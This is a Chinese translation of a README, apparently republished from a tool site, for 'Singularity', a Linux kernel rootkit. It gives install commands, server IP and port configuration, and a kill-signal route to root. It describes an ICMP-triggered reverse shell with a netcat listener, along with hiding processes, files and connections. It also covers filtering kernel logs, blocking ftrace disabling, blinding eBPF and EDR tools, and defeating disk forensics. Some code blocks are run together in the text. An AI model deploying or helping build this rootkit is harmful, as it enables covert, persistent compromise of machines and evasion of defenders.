“给取证工作找点麻烦如何?”
本项目灵感来源于一位对我而言非常特别的女性:Mocinha
Singularity 是一款专为现代6.x内核设计的强大Linux内核模块(LKM)Rootkit。它通过ftrace基础设施实现高级系统调用劫持,提供全面的隐蔽能力。
完整研究文章(旧版):Singularity: 一个终局级Linux内核Rootkit
EDR逃逸案例研究:使用Singularity绕过Elastic EDR
演示视频:Singularity vs eBPF安全工具:Singularity vs eBPF安全工具
利用Singularity钩子攻破eBPF安全机制:攻破eBPF
Singularity 是一款在内核层面运行的精巧Rootkit,提供以下功能:
/sys/fs/cgroup/*/cgroup.procs检测cd /dev/shm git clone https://github.com/MatheuZSecurity/Singularity cd Singularity sudo bash setup.sh cd ..
就这样。该模块自动:
- 从 lsmod、/proc/modules、/sys/module 中隐藏自身
- 清除内核污染标志
- 从 dmesg、journalctl -k、klogctl 中过滤敏感字符串
- 开始保护您的隐藏文件和进程
### 重要说明
**模块在加载后自动隐藏自身**
**没有卸载功能——需要重启才能移除**
**先在虚拟机中测试——不重启无法移除**
## 配置
### 设置您的服务器 IP 和端口
**编辑 `include/core.h`:**```c
#define YOUR_SRV_IP "192.168.1.100" // Change this to your server IP
#define YOUR_SRV_IPv6 { .s6_addr = { [15] = 1 } } // IPv6 if needed
编辑 modules/icmp.c:```c
#define SRV_PORT "8081" // Change this to your desired port
**编辑 `modules/bpf_hook.c`:**```c
#define HIDDEN_PORT 8081 // Must match SRV_PORT
编辑 modules/hiding_tcp.c:```c
#define PORT 8081 // Must match SRV_PORT
**重要**:所有端口定义必须匹配,以确保正确的网络隐藏和ICMP反向shell功能。
## 使用方法
### 隐藏进程```bash
# Hide current shell
kill -59 $$
# Hide specific process
kill -59 <PID>
进程将对 ps、top、htop、/proc 以及所有监控工具不可见。所有子进程都会被自动追踪并隐藏。
匹配您配置模式的文件会被自动隐藏:```bash mkdir singularity echo "secret" > singularity/data.txt
ls -la | grep singularity
cat singularity/data.txt
cd singularity
<p align="center">
<img src="https://assets.kitploit.com/production/public/readmes/10489/13713f834a730a67b38b024c092d77eb111a7d38e2fa0ac16a8f36ffd3506f90.png">
</p>
### 成为Root
**基于信号的方法:**```bash
kill -59 $$
id # uid=0(root)
您配置的端口(默认:8081)上的连接会自动隐藏:```bash nc -lvnp 8081
ss -tulpn | grep 8081 # (no output) netstat -tulpn | grep 8081 # (no output) lsof -i :8081 # (no output) cat /proc/net/nf_conntrack | grep 8081 # (no output)
ss -tapen | grep 8081 # (no output) conntrack -L | grep 8081 # (no output)
数据包在原始套接字级别(tpacket_rcv)被丢弃,并隐藏于以下位置:
- /proc/net/* 接口(tcp, tcp6, udp, udp6)
- /proc/net/nf_conntrack
- Netlink SOCK_DIAG 查询(用于 ss, lsof)
- Netlink NETFILTER/conntrack 消息(用于 conntrack 工具)
<p align="center">
<img src="https://assets.kitploit.com/production/public/readmes/10489/a77a916efc8ee8b9091b3a0ef3acfde44eff570bc022477a3906fac1f623993f.png">
</p>
### ICMP 反向 Shell
远程触发隐藏的反向 Shell,自动绕过 SELinux:
**1. 启动监听器:**```bash
nc -lvnp 8081 # Use your configured port
2. 发送ICMP触发器:```bash sudo python3 scripts/trigger.py <target_ip>
**3. 获取 root shell**(自动隐藏所有子进程,若 SELinux 处于强制模式则绕过)
<p align="center">
<img src="https://assets.kitploit.com/production/public/readmes/10489/6d501d17287ba7f674b766dd25b281d2b26d9f420baa3bbc5a9cc9863db541fc.png">
</p>
## 保护机制
### Ftrace 控制保护
所有禁用 ftrace 的尝试都会被静默拦截并阻止:```bash
echo 0 > /proc/sys/kernel/ftrace_enabled # Appears successful but does nothing
受保护的系统调用:write, writev, pwrite64, pwritev, pwritev2, sendfile, sendfile64, splice, vmsplice, tee, copy_file_range, io_uring_enter(具有基于每个 PID 的智能缓存)
bpf_hook.c 模块实现了一种复杂的反检测系统,用于对抗基于 eBPF 的安全工具。它并非完全阻止 BPF 系统调用(这会产生检测指纹),而是有选择地在内核层面过滤数据,使隐藏的进程和连接对 eBPF 程序不可见。
策略:拦截 eBPF 程序用于数据收集和报告的函数,而非 BPF 系统调用本身。这允许合法的 eBPF 工具正常运行,同时阻止它们看到隐藏的资源。
受保护的资源:
拦截点:
这种方法可击败 eBPF 安全工具,且不会触发因完全阻止 BPF 操作而可能产生的警报。
在 ftrace_enabled 和 tracing_on 尝试中,针对 io_uring 绕过进行保护,并带有智能缓存(每个 PID 1 秒缓存,以防止重复的进程扫描并减少开销)
对所有内核日志接口中的敏感字符串进行实时过滤:
| 接口 | 钩子 | 状态 |
|---|---|---|
dmesg | 读取钩子(位于 /proc/kmsg) | 已过滤 |
journalctl -k | 写入钩子(输出过滤) | 已过滤 |
klogctl() / syslog() | do_syslog 钩子 | 已过滤 |
/sys/kernel/debug/tracing/* | 读取钩子 | 已过滤 |
/var/log/kern.log, syslog, auth.log | 读取钩子 | 已过滤 |
/proc/kallsyms, /proc/kcore, /proc/vmallocinfo | 读取钩子 | 已过滤 |
/proc/net/nf_conntrack | 读取钩子 | 已过滤 |
过滤关键词:taint, journal, singularity, Singularity, matheuz, zer0t, kallsyms_lookup_name, obliviate, hook, hooked_, constprop, clear_taint, ftrace_helper, fh_install, fh_remove
注意:隐藏 PID 的审计消息会在 netlink 层面丢弃,并带有统计跟踪(get_blocked_audit_count, get_total_audit_count)
Singularity 挂钩 write 系统调用,以检测并过滤来自磁盘取证工具的输出:
工作原理:
/dev/sda, /dev/nvme0n1 等)debugfs /dev/sda3 -R 'ls -l /home/user/singularity'
**检测到的模式:**
- `debugfs:` 前缀
- 带括号的 inode 列表
- `Inode count:`、`Block count:`、`Filesystem volume name:`
- `Filesystem UUID:`、`e2fsck`、`Inode:`
### 进程隐藏实现